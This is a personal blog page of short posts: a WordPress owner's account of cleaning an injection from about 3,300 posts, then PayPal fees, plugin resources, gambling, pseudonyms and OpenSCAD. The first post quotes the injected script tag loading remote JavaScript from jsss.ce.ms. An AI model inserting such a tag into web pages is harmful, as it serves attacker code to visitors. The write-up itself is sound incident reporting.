Author: Maker Block

How to clean an “jsss.ce.ms” SQL injection

Well, that was exciting.  Apparently my website had been attached by some kind of SQL injection.  I was curious if my self-hosted WordPress website had been attacked like 4,300 others.  After some digging around, I found that this was not the case.  A scan by UnmaskParasites.com revealed nothing unusual.  However, a scan by Sucuri’s SiteCheck revealed some Javascript malware entries in some posts.

I say “some” posts.  By this I mean 3300 posts and post revisions dating back to the very first blog entry on this website going to as recently as July 13, 2011.  Not including this post, I’ve got 721 published blog entries – with almost all containing this little gem:

<script type=”text/javascript” src=”http://jsss.ce.ms/16″></script><script type=”text/javascript” src=”http://jsss.ce.ms/16″></script>

Here’s what I did to clean this infection:

  • Copy my entire “_posts”  to “_posts2”
  • Copy my entire “_posts” to “_posts3”
  • Downloaded “_posts3” as a CSV
  • Find and replace all instances of the above script in the CSV with “”
  • Deleted the contents of “_posts3”
  • Uploaded the altered CSV into “_posts3”
  • Renamed “_posts” to “_posts1” and “_posts3” to “_posts”
  • Done!

It’s definitely possible to create a little WordPress plugin to clean this kind of an infection out, but there’s little incentive to do so when the manual fix is relatively easy.  If you’ve got this kind of an infection in your site and don’t know how to take care of it, drop me a line.

PayPal payments and micropayments

So, PayPal has a micropayment system as well as a regular payment system.  The micropayment fee is 5% + $0.05 while the normal fee is 2.9% + $0.30.  For payments below $12.00, it makes sense to use the micropayments system and the normal system above that level.

Here’s the rub – you can only set up your PayPal account for one or the other.  I’m working on a WordPress PayPal plugin, but I’d like to have that plugin work with micropayments without forcing all of my other PayPal transactions to go through that fee structure.  Oh well.

WordPress Plugin Writing Resources

WordPress is easily my favorite open source software project.  I love it for it’s functionality, flexibility, and extensibility.  When it comes to writing a plugin, these are my favorite resources.  Don’t write a plugin without them!

  1. WordPress.org Codex for Writing a Plugin
    1. If you’re just getting started, this is the place to begin
  2. WordPress.org Codex Plugin API
    1. a great overview of the WordPress plugin API
  3. WordPress Action Reference
    • When WordPress displays a post, page, or the administrative pages it has to run through a number of functions and actions.  Your plugin will need to be activated at one of these points, and it is very helpful to know the order in which things happen.
  4. WordPress Filter Reference
    • The WordPress filter reference is a list of WordPress filters.  Each one will be able to deliver a little piece of the website for your to manipulate in your plugins.
  5. WordPress PHP Cross-Reference
    • The WordPress codex is pretty good – but it is not comprehensive.  If you want to know how some of the more obscure functions, variables, or constants work, you’ll just need to dive into the source code itself.  PHPXRef is, hands down, the best way to do this.  It let’s you search and read the the source code from their website.
  6. Top 10 Most Common Coding Mistakes in WordPress Plugins
    • This is quite possibly the best blog post about writing WordPress plugins.  Applying these guidelines will make you a better WordPress developer and your plugins faster, more efficient, and more awesome. :)
  7. How to Design and Style Your WordPress Plugin Admin Panel
    • In a lot of ways, a program is only as good as its user interface.  Build a good friendly and powerful interface and people will use your program.  Build a bad one and no one will use it, no matter how awesome it is.  This one blog post gives numerous little ways to make your WordPress plugin administrative interface look better.

Why I am not a gambler

SMBC Comic
SMBC Comic

See, I’m not a gambler.  For any amount that I’d feel comfortable wagering, it would literally just be easier and take less time for to work a few extra hours.  I recognize that if you’re an actual mathematician you could basically assure yourself of coming out ahead, but I’m just not interested in investing the time of time and resources to assuring myself of a successful gambling attempt.  Again, it would be easier and less time consuming to just work a few extra hours rather than figuring out how to game a system.

In any case, anyone who enjoys gambling would probably tell you it’s the uncertainty, the rush, the thrill of gambling that they enjoy.  If you offered them a way to increase their odds through strict mathematical approaches, they’d probably reject it.  I am not able to enjoy it at all.  I find gambling very stressful.  The moment you put your money on the table, you’re already down and you’re hoping to break even or come out ahead from that point forward.

This is the long way of saying that you’ve got to love entrepreneurial spirit of the guys who’ve figured out how to game the Massachusetts lottery system

My pseudonym is my name

When I began blogging for MakerBot, it was with the stipulation that I would be able to continue to blog under my pseudonym.  This was not a problem at all.  In fact, I was assured that many people go by their adopted ‘nym’s which are more reflective of who they are than their given names ever were.  I’m saddened and disappointed that Google+ does not recognize this and is apparently banning people from their Google accounts for using pseudonyms.

Seriously, guys?  E-mail addresses, logins, Google accounts, they’re all pseudonyms of some fashion.  If Google+ is supposed to be the equivalent of posting my driver’s license online to confirm my name, physical address, and organ donor status, you can delete my account right now.  If, instead, it is about letting people use the names they’ve chosen to participate in social interactions with people who really only know them by those names…  Then stop banning people.

</rant>

Oh, OpenSCAD…

One of things I really like about OpenSCAD is how anything I make in it is guaranteed to be manifold.  It’s a solid modeler and by manipulating, adding, and subtracting solids – I should always end up with another solid.  I exported two of the parts necessary for a Pez Powered Disc Shooter only to discover that OpenSCAD refused to compile one of the parts – because that part had some polygons with an incorrect winding order.  Mind, I had no problems exporting the part in the first place – but importing it back?  Nope.

Oh, OpenSCAD, is our love affair over so soon?